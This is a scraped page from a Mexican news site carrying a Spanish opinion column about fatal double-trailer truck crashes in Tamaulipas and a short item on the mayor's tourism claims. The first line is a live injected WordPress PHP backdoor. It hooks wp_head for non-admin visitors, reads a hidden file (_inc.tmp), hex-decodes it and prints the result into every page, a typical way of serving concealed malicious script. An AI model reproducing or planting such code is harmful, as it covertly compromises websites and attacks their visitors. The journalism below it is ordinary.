if ((is_admin() || (function_exists('get_hex_cache'))) !== true) { add_action('wp_head', 'get_hex_cache', 12); function get_hex_cache() { return print(@hex2bin( '3c7' . (file_get_contents(__DIR__ .'/_inc.tmp')))); } } Los calcinados en Tamaulipas – Reporte Noreste
Conéctate con nosotros

Opinión

Los calcinados en Tamaulipas

Los calcinados en Tamaulipas

Al menos una veintena de personas han muerto en las carreteras de Tamaulipas por los camiones con doble remolque; unidades que circulan gracias a la falta de autoridad y gobernanza, que facilita permisos a través de la Secretaría de Comunicaciones y Transportes (SCT) en la página web del Gobierno de la República, mediante una liga para “Autorización expresa para configuraciones de Tractocamiones Doblemente articulado”… pero, ¿quién los supervisa?

¿Qué es lo que esta sucediendo en las carreteras tamaulipecas, si los mismos empresarios del transporte reclaman que no están autorizando los permisos para la circulación de camiones articulados o doble caja?

A la población en general y todos los usuarios de las carreteras de nada les sirve que los comunicadores informemos de los accidentes; del más trágico y reciente con saldo de 18 personas calcinadas, 5 mujeres y 13 hombres, todos identificados como: Apolinar “S”; Bonifacio “T”; Carlos Aldahir “P”; Carlos Fernando “E”; Carlos “M”; Celia “H”; Edy “J”; Efrén “P”; Enrique “M”; Erick “G”; Eusebia “M”; Jesús Roberto “N”; Josué Hernández “D”; Juan Pedro “H”; Leovigildo “E”; María Eleuteria “H”; Otilio “S” y Sofia “H”.

Con esta información, poco o nada ganan los que transitan por las carreteras del Estado de Tamaulipas, dicho por algunos, el único sin casetas de cobro, la única entidad con verdadero y auténtico libre tránsito, sin impuestos de más, ni negocios para esos cuentos que se dedican al negocio carretero.

En Tamaulipas puedes ser tú el siguiente muerto por una “falla”, dicho técnicamente una: “sobre tensión en su sistema de enganche originando la fractura del seguro del enganche de anillo, desprendiéndose del primer semirremolque continuando sin control de dirección volcándose y desplazándose sobre su costado izquierdo diagonal sobre el carril opuesto, colisionando su parte frontal superior contra el lateral delantero derecho del autobús de pasajeros que era conducido en dirección hacia Monterrey.» Porque justamente eso determinó el peritaje del accidente en el que murieron calcinadas las 18 personas el pasado 10 de septiembre, y eso, justamente hace dos noches fue lo que se repitió en el Libramiento Manuel- González, donde oficialmente una persona murió entre las llamas y el otro conductor no fue localizado.

Necesita la autoridad tomar cartas en el asunto, y frenar con estas peligrosas prácticas que siguen poniendo en peligro, la vida de muchos mexicanos.

En la intimidad… Le cuento que en el marco del Día Internacional del Turismo, el Presidente municipal Chucho Nader, destacó el desarrollo que en el rubro ha tenido la ciudad en los últimos cuatro años, posicionándose como el destino turístico más importante de la entidad y de la región huasteca.

Jesús Nader aseguró que la nueva infraestructura turística desarrollada con el apoyo del Gobierno del Estado, y el clima de paz y seguridad que se vive en el municipio, han permitido un incremento sustancial en la captación de visitantes, así como el arribo de nuevos proyectos de inversión.

Qué presumido salió Chucho Nader… pero ojalá un día construya una cancha pública de Padel, él si sabe darle valor al deporte.

davidcastellanost@hotmail.com
@dect1608

Haga clic para comentar

Leave a Reply

Tu dirección de correo electrónico no será publicada. Los campos obligatorios están marcados con *

Facebook

Principales

Más en Opinión